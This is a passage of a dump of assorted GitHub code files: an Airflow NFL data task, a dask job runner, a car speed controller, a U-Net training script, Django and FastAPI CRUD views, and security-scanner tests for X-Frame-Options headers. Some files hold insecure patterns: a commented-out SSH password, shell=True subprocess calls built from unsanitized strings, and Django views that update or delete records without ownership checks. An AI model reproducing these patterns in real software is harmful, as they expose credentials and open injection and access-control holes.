EXCLUDED.player_first_name\n , player_last_name = EXCLUDED.player_last_name\n , player_full_name = 
EXCLUDED.player_full_name\n , slug = EXCLUDED.slug\n , total_projection = EXCLUDED.total_projection\n , insert_date = EXCLUDED.insert_date;\n \"\"\",\n tuple(nfl_players_preped),\n page_size=1000,\n )\n\n print(f\"{len(nfl_players_preped)} nfl players to inserted or updated.\")\n conn.commit()\n cursor.close()\n return \"dynastr.nfl_player_projections\"\n\n\n@task()\ndef surrogate_key_formatting(table_name: str):\n pg_hook = PostgresHook(postgres_conn_id=\"postgres_akv\")\n conn = pg_hook.get_conn()\n cursor = conn.cursor()\n print(\"Connection established\")\n cursor.execute(\n f\"\"\"UPDATE {table_name} \n SET player_first_name = replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(player_first_name,'.',''), ' Jr', ''), ' III',''),'Jeffery','Jeff'), 'Joshua','Josh'),'William','Will'), ' II', ''),'''',''),'Kenneth','Ken'),'Mitchell','Mitch'),'DWayne','Dee')\n \"\"\"\n )\n conn.commit()\n cursor.close()\n return\n\n","repo_name":"glstream/superflexAstro","sub_path":"dags/tasks/nfl.py","file_name":"nfl.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12924352062","text":"import argparse\nimport os\nimport time\nimport sys\nimport subprocess\nfrom subprocess import PIPE\nimport multiprocessing\nimport pandas as pd\n#from dask import dataframe as dd \nfrom distutils.dir_util import copy_tree, remove_tree\nimport dask\nfrom dask.distributed import Client, SSHCluster, LocalCluster, progress\nimport utils\n\n\ndef set_cluster(jobs_sum):\n while True:\n try:\n input_num = int(input('\\nWhich mode you wish to run tasks?\\n 1.Local machine\\n 2.SSH Cluster\\n'))\n if input_num in range(1,3): \n if input_num == 1:\n n_cpu=multiprocessing.cpu_count()\n #set up local cluster using dask\n cluster = LocalCluster(n_workers=n_cpu, threads_per_worker=1, dashboard_address='0')\n print(f\"Start {jobs_sum} jobs on local machine....\\n\")\n else: \n cluster = SSHCluster(\n #[\"localhost\", \"118.138.246.177\"],\n #connect_options={\"known_hosts\": None, 'username':'yifan', 'password':'prp2020'},\n [\"localhost\", \"192.168.232.129\"],\n connect_options={\"known_hosts\": None, },\n worker_options={\"nthreads\": 5, \"nprocs\": 1},\n scheduler_options={\"port\": 0, \"dashboard_address\": \":8790\"},) \n print(f\"Start {jobs_sum} jobs on SHH cluster....\\n\") \n break\n except (ValueError):\n pass\n print('Wrong input vaule!')\n continue\n return cluster\n\n\n\n\n\n#get all problem and domain paths \ndef get_path(d, s, e, p): \n for di,si,ei, planneri in zip(d,s,e,p):\n di_file = f\"{di}.csv\"\n df=pd.read_csv(os.path.join(utils.DB_PATH_PATH, di_file))\n for pi in range(int(si-1), int(ei)):\n if df['domain_path'].isnull().values.any(): #if any value is NaN, so the style is (domain p1) (domain p2) (domain p3) (domain p4)... not (d1 p1) (d2 p2) (d3 p3) (d4 p4)... 
\n                all_d.append(df['domain_path'][0])\n            else:\n                all_d.append(df['domain_path'][pi]) \n            all_p.append(df['problem_path'][pi])\n            all_planner.append(planneri)\n    return all_d, all_p, all_planner\n\n\ndef run_jobs(d, p, planner, job_id, output_folder):\n    #if python version >3.6, change stdout=PIPE to capture_output=True\n    result = subprocess.run(f\"python3 planner.py {d} {p} {planner} {job_id} {output_folder}\", stdout=PIPE, shell=True)\n    print(result.stdout.decode(\"utf-8\"))\n    return result.stdout\n\n\n\n\ndef get_files_path():\n    #get the name of task file \n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"task\")\n    args = parser.parse_args()\n    task_path = os.path.join(utils.TASK_PATH, args.task)\n\n    try:\n        df = pd.read_csv(task_path) \n    except:\n        print(\"Task does not exist!\\nPlease use command: python3 run.py [task.csv]\")\n        sys.exit()\n    \n    return df['domain_name'],df['start_problem'],df['end_problem'],df['planner']\n\ndef get_input_str(input_str):\n    \n    save_file_name=input(input_str)\n    if not (save_file_name==\"\" or save_file_name.isspace()):\n        return save_file_name\n    else:\n        print(\"Error: folder name can not be empty!\")\n        sys.exit()\n\n\nif __name__ == '__main__':\n    (d,s,e,p) = get_files_path()\n    #all task domain files and problem files\n    all_d = []\n    all_p = []\n    all_planner=[] \n    \n    # get all jobs \n    (all_d,all_p,all_planner)=get_path(d, s, e, p)\n    # get output folder name\n    prompt = '\\nPlease enter a folder name for saving output data of all jobs:\\n'\n    output_folder = get_input_str(prompt)\n    \n    #set cluster \n    cluster = set_cluster(len(all_p))\n    client = Client(cluster,asynchronous=True)\n\n    st = time.time()\n    futures=[]\n    #'''\n    for i in range(len(all_p)): \n        #run_planner(all_d[i], all_p[i], all_planner[i], i) \n        future = client.submit(run_jobs, all_d[i], all_p[i], all_planner[i], i, output_folder) \n        futures.append(future)\n    results = client.gather(futures)\n    '''\n    for result in results:\n        print(result.decode(\"utf-8\"))\n    '''\n    #print(results)\n    \n    et = time.time()\n    print(f\"Finish {len(all_p)} jobs using {et - st}(s)\")\n\n    \n\n\n","repo_name":"zbmsnj1/Planner-Carrier","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"}
{"seq_id":"30344036089","text":"import time\n\nimport ADCPlatform\nimport numpy as np\n\nspeedPidThread_1 = 10  # control threshold 1\nspeedPidThread_2 = 2  # control threshold 2\n\"\"\"\n\n\"\"\"\n\n\ndef lontitudeControlSpeed(speed, lonPid):\n    lonPid.update(speed - 5.0)\n    if lonPid.output > speedPidThread_1:  # acceleration stage\n\n        # print(\"==============================================\")\n        # print('speed is:', speed, 'output is:', lonPid.output, 'stage 1')\n        # print(\"==============================================\")\n        lonPid.thorro_ = 1\n        lonPid.brake_ = 0\n\n    elif lonPid.output > speedPidThread_2:  # steady speed-control stage\n\n        # print(\"==============================================\")\n        # print('speed is:', speed, 'output is:', lonPid.output, 'stage 2')\n        # print(\"==============================================\")\n\n        lonPid.thorro_ = min((lonPid.output / speedPidThread_1) * 0.85, 1.0)\n        lonPid.brake_ = min(((speedPidThread_1 - lonPid.output) / speedPidThread_1) * 0.1, 1.0)\n\n    elif lonPid.output > 0:  # lower side, fine adjustment\n\n        # print(\"==============================================\")\n        # print('speed is:', speed, 'output is:', lonPid.output, 'stage 3')\n        # print(\"==============================================\")\n        lonPid.thorro_ = (lonPid.output / speedPidThread_2) * 0.3\n        
lonPid.brake_ = ((speedPidThread_2 - lonPid.output) / speedPidThread_2) * 0.2\n\n    elif lonPid.output < -1 * speedPidThread_1:  # deceleration stage\n\n        # print(\"==============================================\")\n        # print('speed is:', speed, 'output is:', lonPid.output, 'stage 4')\n        # print(\"==============================================\")\n        lonPid.thorro_ = (-1 * lonPid.output / 5) * 0.1\n        lonPid.brake_ = 0.5\n\n\n    else:\n        # print(\"==============================================\")\n        # print('speed is:', speed, 'output is:', lonPid.output, 'stage 5')\n        # print(\"==============================================\")\n        lonPid.thorro_ = (-1 * lonPid.output / speedPidThread_2) * 0.2\n        lonPid.brake_ = ((speedPidThread_2 - (-1 * lonPid.output)) / speedPidThread_2) * 0.4\n    # print(lonPid.thorro_, ' ', lonPid.brake_)\n\n\ndef getTTC(current_speed, current_acceleration, dist, safe_dist):\n    v = current_speed\n    a = current_acceleration\n\n    if a != 0:\n        ttc = (-v + np.sqrt(v ** 2 + 2 * a * (dist - safe_dist))) / a\n    else:\n        ttc = 999\n\n    return ttc\n\n\ndef set_state(myCar, Controller, control_data_package, radar_data_package, line_data_package):\n    # current vehicle speed\n    spd = control_data_package.json['FS']\n\n    # current yaw angle\n    yaw = control_data_package.json['CAO']\n\n    # current yaw rate\n    yr = control_data_package.json['YR']\n\n    if radar_data_package is not None:\n        # pick out the closest vehicle\n        mindis_car = None\n        MIN_DIS = 9999.99\n        mindis_car = min(radar_data_package.json, key=lambda car: car['Range'])\n\n        if mindis_car is not None:\n            # v: cm/s\n            # speed relative to the vehicle ahead\n            delta_spd = mindis_car[\"Speed\"] / 100  # m/s\n            print(\"relative speed to car ahead:\", delta_spd)\n\n            # distance to the vehicle ahead\n            dist = mindis_car[\"Range\"] / 100  # m\n            print(\"relative distance to car ahead:\", dist)\n\n            myCar.dist = dist\n\n            myCar.delta_v = delta_spd\n\n            print(\"min dis car:\", mindis_car)\n\n    if line_data_package is not None:\n\n        if len(line_data_package.json) == 4:\n            myCar.positionnow = -6.5 + (line_data_package.json[2]['A1'] + line_data_package.json[1]['A1'])\n        else:\n            print(\"ERROR\")\n            myCar.positionnow = -7.0\n\n    # save the current state\n\n    myCar.speed = spd\n    myCar.cao = yaw\n    myCar.yr = yr\n\n    return myCar\n\n\ndef run_task0_test(myCar, Controller, control_data_package, radar_data_package, line_data_package):\n    # redefine myCar according to the task\n    myCar = set_state(myCar, Controller, control_data_package, radar_data_package, line_data_package)\n\n    # to use the TTC model, its acceleration must be measured first\n\n    Controller.speedPid.setSetpoint(60)\n\n    # longitudinal control: thorro_ and brake_\n    lontitudeControlSpeed(myCar.speed, Controller.speedPid)\n\n    # no lateral control needed\n\n    Controller.latPid.steer_ = 0\n\n    # print(\"spd:\", myCar.speed)\n    # print(\"position:\", myCar.positionnow)\n\n    if myCar.delta_v != 0:\n        dt = np.round(myCar.dist / myCar.delta_v, 3)\n        # dt = 0.3\n    else:\n        dt = 999\n\n    delta_a = np.round(myCar.delta_v / dt, 3)\n\n    # flag = True\n    # while flag:\n    #     t1 = time.time()\n\n    # print(\"dt:\", -dt,\"delta_a:\",delta_a)\n    ttc = getTTC(myCar.speed, delta_a, myCar.dist, safe_dist=0.5)\n\n    # dist = 10, ttc = 4\n    # 30 --> 4, 20 --> 4 , 0 --> 2, avg = 20\n\n    # 30 --> 4, 20 --> 3 , 0 --> 3, avg = 18\n    # if myCar.dist < 10 and ttc < 4:\n\n    DANGER = False\n\n    if myCar.dist < 7.3:\n        DANGER = True\n\n    if myCar.dist < 18 and myCar.delta_v < -10:\n        DANGER = True\n\n    if ttc > 0.55 and not DANGER and ttc != 999:\n        # use PID for longitudinal control under normal conditions\n        print(\"normal PID: ttc:\", ttc)\n        ADCPlatform.control(Controller.speedPid.thorro_, Controller.latPid.steer_, 0, 1)\n\n    elif ttc <= 0.55 and not DANGER:\n        print(\"soft brake: dist:\", myCar.dist, \"ttc:\", ttc, \"delta_a:\", delta_a)\n        brake_ = 0.14 * delta_a\n        ADCPlatform.control(0, 0, brake_, 1)\n\n    elif 
DANGER:\n        # if too close, hard brake\n        print(\"hard brake: danger!\")\n        ADCPlatform.control(0, 0, 1, 1)\n\n    # print(\"\\t\", \"distance to car ahead:\", myCar.dist, \"\\t\", \"ego speed:\", myCar.speed, \"\\t\", \"relative speed:\", myCar.delta_v, \"\\t\", \"relative acceleration:\", delta_a)\n    print(\"----------------------------------------------------------------------------------------\")\n","repo_name":"6Lackiu/WIDCAutonomousDriving","sub_path":"control/task/task0.py","file_name":"task0.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"}
{"seq_id":"8257992922","text":"import tensorflow as tf\nimport glob\nimport src.data as data\nimport Program.show as show\nimport Program.model as MYMODEL\nfrom tensorflow_examples.models.pix2pix import pix2pix\nimport tensorflow_datasets as tfds\n\ntfds.disable_progress_bar()\nfrom IPython.display import clear_output\nimport matplotlib.pyplot as plt\n\n# Datasets, info = tfds.load('oxford_iiit_pet:3.*.*', with_info=True)\nimages_file_path = '..\\\\..\\\\DATA\\\\ISIC2016\\\\ISBI2016_ISIC_Part1_Training_Data\\\\*jpg'\nmasks_file_path = '..\\\\..\\\\DATA\\\\ISIC2016\\\\ISBI2016_ISIC_Part1_Training_GroundTruth\\\\*.png'\n\n# images_file_path = \"..\\\\..\\\\DATA\\\\Oxford-IIIT Pet\\\\images\\\\*jpg\"\n# masks_file_path = \"..\\\\..\\\\DATA\\\\Oxford-IIIT Pet\\\\annotations\\\\trimaps\\\\*.png\"\n\nimages_path = glob.glob(images_file_path)\nmasks_path = glob.glob(masks_file_path)\n\ntrain_count = int(len(images_path) * 0.8)  # 80%\ntest_count = len(images_path) - train_count  # 20%\nprint('dataset size:', len(images_path),\n      'training set size:', train_count, 'test set size:', test_count)\n\nbatch_size = 64\nbuffer_size = 1000\ntrain_dataset, test_dataset, train, test = data.distribute(images_path, masks_path, test_count, batch_size, buffer_size)\nsteps_per_epoch = train_count // batch_size  # 900*0.8/64=11\nprint('number of training images:', train_count, 'steps per epoch:', steps_per_epoch)\n\n# train: \n# test: \n# train_dataset: \n# test_dataset: \n\n\nfor image, mask in train.take(1):\n    sample_image, sample_mask = image, mask\nshow.display([sample_image, sample_mask])\n\n# The number of output channels is 3 because each pixel can take one of three labels. Think of this as multi-class classification where each pixel is assigned to one of three classes.\nOUTPUT_CHANNELS = 3\n\n# The encoder is a pretrained MobileNetV2 model, prepared and ready to use in tf.keras.applications.\nbase_model = tf.keras.applications.MobileNetV2(input_shape=[128, 128, 3], include_top=False)\n# base_model = tf.keras.applications.MobileNetV2()\n# \n\n# Use the activations of these layers\nlayer_names = [\n    'block_1_expand_relu',   # 64x64\n    'block_3_expand_relu',   # 32x32\n    'block_6_expand_relu',   # 16x16\n    'block_13_expand_relu',  # 8x8\n    'block_16_project',      # 4x4\n]\nlayers = [base_model.get_layer(name).output for name in layer_names]\n\n# Create the feature extraction model\ndown_stack = tf.keras.Model(inputs=base_model.input, outputs=layers)\n\ndown_stack.trainable = False\n\n# The decoder/upsampler is simply a series of upsample blocks implemented in TensorFlow examples.\nup_stack = [\n    pix2pix.upsample(512, 3),  # 4x4 -> 8x8\n    pix2pix.upsample(256, 3),  # 8x8 -> 16x16\n    pix2pix.upsample(128, 3),  # 16x16 -> 32x32\n    pix2pix.upsample(64, 3),   # 32x32 -> 64x64\n]\n\n\ndef unet_model(output_channels):\n    inputs = tf.keras.layers.Input(shape=[128, 128, 3])\n    x = inputs\n\n    # Downsampling through the model\n    skips = down_stack(x)\n    x = skips[-1]\n    skips = reversed(skips[:-1])\n\n    # Upsampling and establishing the skip connections\n    for up, skip in zip(up_stack, skips):\n        x = up(x)\n        concat = tf.keras.layers.Concatenate()\n        x = concat([x, skip])\n\n    # This is the last layer of the model\n    last = tf.keras.layers.Conv2DTranspose(\n        output_channels, 3, strides=2,\n        padding='same')  # 64x64 -> 128x128\n\n    x = last(x)\n\n    return 
tf.keras.Model(inputs=inputs, outputs=x)\n\n\nmodel = unet_model(OUTPUT_CHANNELS)\nmodel.compile(optimizer='adam',\n              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n              metrics=['accuracy'])\n\n# Take a quick look at the final model architecture:\ntf.keras.utils.plot_model(model, show_shapes=True)\n\n\n# Predictions\ndef create_mask(pred_mask):\n    pred_mask = tf.argmax(pred_mask, axis=-1)\n    pred_mask = pred_mask[..., tf.newaxis]\n    return pred_mask[0]\n\n\ndef show_predictions(dataset=None, num=1):\n    if dataset:\n        for image, mask in dataset.take(num):\n            pred_mask = model.predict(image)\n            show.display([image[0], mask[0], create_mask(pred_mask)])\n    else:\n        show.display([sample_image, sample_mask,\n                      create_mask(model.predict(sample_image[tf.newaxis, ...]))])\n\n\nshow_predictions()\n\n\nclass DisplayCallback(tf.keras.callbacks.Callback):\n    def on_epoch_end(self, epoch, logs=None):\n        clear_output(wait=True)\n        show_predictions()\n        print('\\nSample Prediction after epoch {}\\n'.format(epoch + 1))\n\n\nEPOCHS = 20\nVAL_SUBSPLITS = 5\nVALIDATION_STEPS = test_count // batch_size // VAL_SUBSPLITS\n\nmodel_history = model.fit(train_dataset, epochs=EPOCHS,\n                          steps_per_epoch=steps_per_epoch,\n                          validation_steps=VALIDATION_STEPS,\n                          validation_data=test_dataset,\n                          callbacks=[DisplayCallback()])\n\nloss = model_history.history['loss']\nval_loss = model_history.history['val_loss']\n\nepochs = range(EPOCHS)\n\nplt.figure()\nplt.plot(epochs, loss, 'r', label='Training loss')\nplt.plot(epochs, val_loss, 'bo', label='Validation loss')\nplt.title('Training and Validation Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss Value')\nplt.ylim([0, 1])\nplt.legend()\nplt.show()\n\n# show_predictions(test_dataset, 3)\n","repo_name":"zmoth/image_segmentation","sub_path":"reference/Unet_tensorflow.py","file_name":"Unet_tensorflow.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"18707050362","text":"import random\nimport unittest\n\nclass Node():\n    def __init__(self, data=None, left=None, right=None):\n        self.data, self.left, self.right = data, left, right\n        self.count = 1\n        if self.left:\n            self.count += self.left.count\n        if self.right:\n            self.count += self.right.count\n\n    def number_node(self, num):\n        if num == 0:\n            return self\n        if self.left:\n            # Check whether the left subtree contains more children than the given num\n            if num - 1 < self.left.count:\n                return self.left.number_node(num-1)\n            # If the left subtree has fewer children than num, move on to the right children\n            elif self.right:\n                return self.right.number_node(num - 1 - self.left.count)\n        if self.right:\n            return self.right.number_node(num-1)\n        return None\n\n    def random_node(self):\n        return self.number_node(randint(0, self.count - 1))\n\nfixed_num = False\n\ndef randint(start, end):\n    if not fixed_num is False:\n        return fixed_num\n    return random.randint(start, end)\n\nclass Test(unittest.TestCase):\n    def test_mock_randint(self):\n        global fixed_num\n        fixed_num = 12\n        self.assertEqual(randint(0, 2000), 12)\n\n    def test_get_random_value(self):\n        global fixed_num\n        tree = Node(11, Node(21, Node(31), Node(32, Node(41), Node(42, None, Node(51)))),\n                    Node(22, Node(33), Node(34)))\n        fixed_num = 0\n        self.assertEqual(tree.random_node().data, 11)\n        fixed_num = 4\n        self.assertEqual(tree.random_node().data, 41)\n        fixed_num = 8\n        self.assertEqual(tree.random_node().data, 33)\n\n\nif __name__ == \"__main__\":\n    
unittest.main()\n\n","repo_name":"Already-Ready/CtCI_Python","sub_path":"Ch_4/Q4_11_random_node.py","file_name":"Q4_11_random_node.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"16882186552","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n# from login.models import Login\nfrom lists.models import Lists\nfrom django.contrib.auth.decorators import login_required\n# from django.contrib.auth import authenticate\nfrom django.contrib import messages\nfrom lists.models import Projet , Nature , Emplacement\nfrom lists.forms import ProjetForm , NatureForm, EmplacementForm , UpdateProjetForm , UpdateNatureForm , UpdateEmplacementForm\nfrom dashboard.models import ProjectStats\nfrom .filters import filtrer_par_projet , filtrer_par_nature , filtrer_par_emplacement\n\n\n# login required for acces\n@login_required(login_url='acces')\ndef flists(request):\n emplacements=Emplacement.objects.filter(user=request.user).order_by('-id')\n projets=Projet.objects.filter(user=request.user).order_by('-id')\n natures=Nature.objects.filter(user=request.user).order_by('-id')\n # users=Login.objects.filter(user=request.user).order_by('-id')\n lists=Lists.objects.filter(user=request.user).order_by('-id')\n filterProjet=filtrer_par_projet(request.GET , queryset=projets , request=request)\n projets=filterProjet.qs \n filterNature=filtrer_par_nature(request.GET , queryset=natures , request=request)\n natures=filterNature.qs\n filterEmplacement=filtrer_par_emplacement(request.GET , queryset=emplacements , request=request)\n emplacements=filterEmplacement.qs\n context = {'lists':lists , 'projets':projets , 'natures':natures , 'emplacements':emplacements , 'filterProjet':filterProjet , 'filterNature':filterNature ,'filterEmplacement':filterEmplacement }\n return render(request , 'lists/lists.html' , context)\n\n\n\n\n@login_required(login_url='my-login')\ndef create_projet(request):\n if request.method == \"POST\":\n form = ProjetForm(request.POST)\n if form.is_valid():\n projet = form.save(commit=False)\n projet.user = request.user\n projet.save()\n\n # Create or update the ProjectStats record\n dashboard_project, created = ProjectStats.objects.get_or_create(user=request.user)\n dashboard_project.update_stats()\n\n return redirect('lists')\n else:\n print(\"Form is not valid\")\n return redirect('lists')\n else:\n form = ProjetForm()\n\n return render(request, 'lists/create_projet.html', {'form': form})\n\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_projet(request, pk):\n\n projet = Projet.objects.get(id=pk)\n\n projet.delete()\n \n # Create or update the ProjectStats record\n dashboard_project, created = ProjectStats.objects.get_or_create(user=request.user)\n dashboard_project.update_stats()\n\n return redirect(\"lists\")\n\n\n\n\n\n@login_required(login_url='acces')\ndef create_nature(request):\n form = NatureForm()\n\n if request.method == \"POST\":\n form = NatureForm(request.POST or None)\n if form.is_valid():\n nature=form.save(commit=False)\n nature.user = request.user\n nature.save()\n return redirect('lists')\n else:\n print(\"form is not valid\")\n return redirect('lists')\n\n return render(request , 'lists/create_nature.html' , {'form': form})\n\n\n\n\n\n@login_required(login_url='acces')\ndef create_emplacement(request):\n form = EmplacementForm()\n\n if request.method == \"POST\":\n form = EmplacementForm(request.POST or None)\n if 
form.is_valid():\n            emplacement=form.save(commit=False)\n            emplacement.user = request.user\n            emplacement.save()\n            return redirect('lists')\n        else:\n            print(\"form is not valid\")\n            return redirect('lists')\n\n    return render(request , 'lists/create_emplacement.html' , {'form': form})\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_projet(request, pk):\n\n    projet = Projet.objects.get(id=pk)\n\n    form = UpdateProjetForm(instance=projet)\n\n    if request.method == 'POST':\n\n        form = UpdateProjetForm(request.POST, instance=projet)\n\n        if form.is_valid():\n\n            form.save()\n\n            return redirect(\"lists\")\n    \n    context = {'form':form}\n\n    return render(request, 'lists/update-projet.html', context=context)\n\n\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_nature(request, pk):\n\n    nature = Nature.objects.get(id=pk)\n\n    form = UpdateNatureForm(instance=nature)\n\n    if request.method == 'POST':\n\n        form = UpdateNatureForm(request.POST, instance=nature)\n\n        if form.is_valid():\n\n            form.save()\n\n            return redirect(\"lists\")\n    \n    context = {'form':form}\n\n    return render(request, 'lists/update-nature.html', context=context)\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_nature(request, pk):\n\n    nature = Nature.objects.get(id=pk)\n\n    nature.delete()\n\n    return redirect('lists')\n\n\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_emplacement(request, pk):\n\n    emplacement = Emplacement.objects.get(id=pk)\n\n    form = UpdateEmplacementForm(instance=emplacement)\n\n    if request.method == 'POST':\n\n        form = UpdateEmplacementForm(request.POST, instance=emplacement)\n\n        if form.is_valid():\n\n            form.save()\n\n            return redirect(\"lists\")\n    \n    context = {'form':form}\n\n    return render(request, 'lists/update-emplacement.html', context=context)\n\n\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_emplacement(request, pk):\n\n    emplacement = Emplacement.objects.get(id=pk)\n\n    emplacement.delete()\n\n    return redirect('lists')","repo_name":"saber0amine/GIDNA","sub_path":"djangoT/lists/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"884207794","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom flask import make_response\n\nfrom base import TestPluginBaseClass, test_app\n\n@test_app.route('/xfo-with-deny')\ndef xfo_with_deny():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'DENY'\n return res\n\n@test_app.route('/xfo-with-sameorigin')\ndef xfo_with_sameorigin():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'SAMEORIGIN'\n return res\n\n@test_app.route('/xfo-with-allow-from')\ndef xfo_with_allow_from():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM http://localhost:1234/'\n return res\n\n@test_app.route('/xfo-with-allow-from-with-colon')\ndef xfo_with_allow_from_with_colon():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM: http://localhost:1234/'\n return res\n\n@test_app.route('/xfo-with-allow-from-without-http')\ndef xfo_with_allow_from_withou_http():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM localhost:1234/'\n return res\n\n@test_app.route('/bad-xfo')\ndef bad_xfo():\n res = make_response(\"
Hello World!
\")\n res.headers['X-Frame-Options'] = \"CHEESE\"\n return res\n\n@test_app.route('/no-xfo')\ndef no_xfo():\n res = make_response(\"\")\n return res\n\nclass TestXFrameOptionsPlugin(TestPluginBaseClass):\n __test__ = True\n @classmethod\n def setUpClass(cls):\n super(TestXFrameOptionsPlugin, cls).setUpClass()\n cls.pname = \"XFrameOptionsPlugin\"\n\n def validate_xframe_plugin(self, runner_resp, request_resp, expected=None, expectation=True):\n if expectation is True:\n self.assertEqual('X-Frame-Options header is set properly', runner_resp[1]['data']['Summary'])\n self.assertEqual('Info', runner_resp[1]['data']['Severity'])\n self.assertEqual(expected, request_resp.headers['X-Frame-Options'])\n elif expectation == 'INVALID':\n fragement = request_resp.headers['X-Frame-Options']\n self.assertEqual(True, fragement in runner_resp[1]['data']['Description'])\n self.assertEqual(\"High\", runner_resp[1]['data']['Severity'])\n self.assertEqual(\"The following X-Frame-Options header value is detected and is invalid: %s\" % fragement, \\\n runner_resp[1]['data']['Description'])\n self.assertEqual(expected, request_resp.headers['X-Frame-Options'])\n else:\n self.assertEqual(True, \"X-Frame-Options header is not found.\" in runner_resp[1]['data']['Description'])\n\n def test_bad_xframe_option(self):\n api_name = \"/bad-xfo\"\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='CHEESE', expectation='INVALID')\n\n def test_xframe_option_with_same_origin(self):\n api_name = '/xfo-with-sameorigin'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='SAMEORIGIN', expectation=True)\n\n def test_xframe_option_with_deny(self):\n api_name = '/xfo-with-deny'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='DENY', expectation=True)\n\n def test_xframe_option_with_allow_from(self):\n api_name = '/xfo-with-allow-from'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM http://localhost:1234/', expectation=True)\n\n def test_xframe_option_with_allow_from_colon_gets_rejected(self):\n api_name = '/xfo-with-allow-from-with-colon'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM: http://localhost:1234/', expectation='INVALID')\n\n def test_xframe_option_without_http(self):\n api_name = '/xfo-with-allow-from-without-http'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM localhost:1234/', expectation='INVALID')\n\n def test_xframe_options_not_set(self):\n api_name = '/no-xfo'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expectation=False)\n","repo_name":"mozmark/minion-backend","sub_path":"tests/functional/plugins/test_xframe.py","file_name":"test_xframe.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"31321132947","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('search', '0047_auto_20211130_1752'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='basket',\n name='created',\n field=models.DateTimeField(default=datetime.date(1970, 1, 1), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='basket',\n name='modified',\n field=models.DateTimeField(default=datetime.date(1970, 1, 1), auto_now=True),\n preserve_default=False,\n ),\n 
]\n","repo_name":"vindarel/abelujo","sub_path":"search/migrations/0048_auto_20211211_1156.py","file_name":"0048_auto_20211211_1156.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"39475789844","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom enum import Enum\n\n\nfrom views.serializer.to_json import build_toJson\nfrom views.notefiscalSchemas import noteficalSchemas\nfrom dbconnection.connection import get_db\nfrom orm import ormNotefical\n\n\nrouter = APIRouter()\n\nclass Tags(Enum):\n name = \"invoice\"\n\n@router.post('/v1/api/note/', response_model=noteficalSchemas, tags=[Tags.name])\nasync def post(note: noteficalSchemas, db: Session = Depends(get_db)):\n data, status = ormNotefical.add_notes(db, note)\n return build_toJson(status=status, content=data)\n\n@router.get('/v1/api/notes/', response_model=noteficalSchemas, tags=[Tags.name] )\nasync def get(skip: int = 0, limit: int = 20, db: Session = Depends(get_db)):\n data, status = ormNotefical.get_notes(db, skip, limit)\n return build_toJson(status=status, content=data)\n\n@router.get('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def get_byid(id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.get_byId_notes(db, id)\n return build_toJson(status=status, content=data)\n\n@router.put('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def put(note: noteficalSchemas, id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.put_notes(db, note, id)\n return build_toJson(status=status, content=data)\n\n@router.delete('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def delete(id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.delete_notes(db, id)\n return build_toJson(status=status, content=data)\n\n ","repo_name":"raianb-dev/commercial-system","sub_path":"routers/routeNotefiscal.py","file_name":"routeNotefiscal.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38182822604","text":"def search_contact(base,contact):\n contacts=base.split('\\n')\n flag=True\n result=[]\n \n for i in contacts:\n if contact in i:\n flag=False\n result.append(i)\n if flag:\n result.append('Контакт не найден')\n return result\n\ndef search_contact_by_id(base,id_str):\n 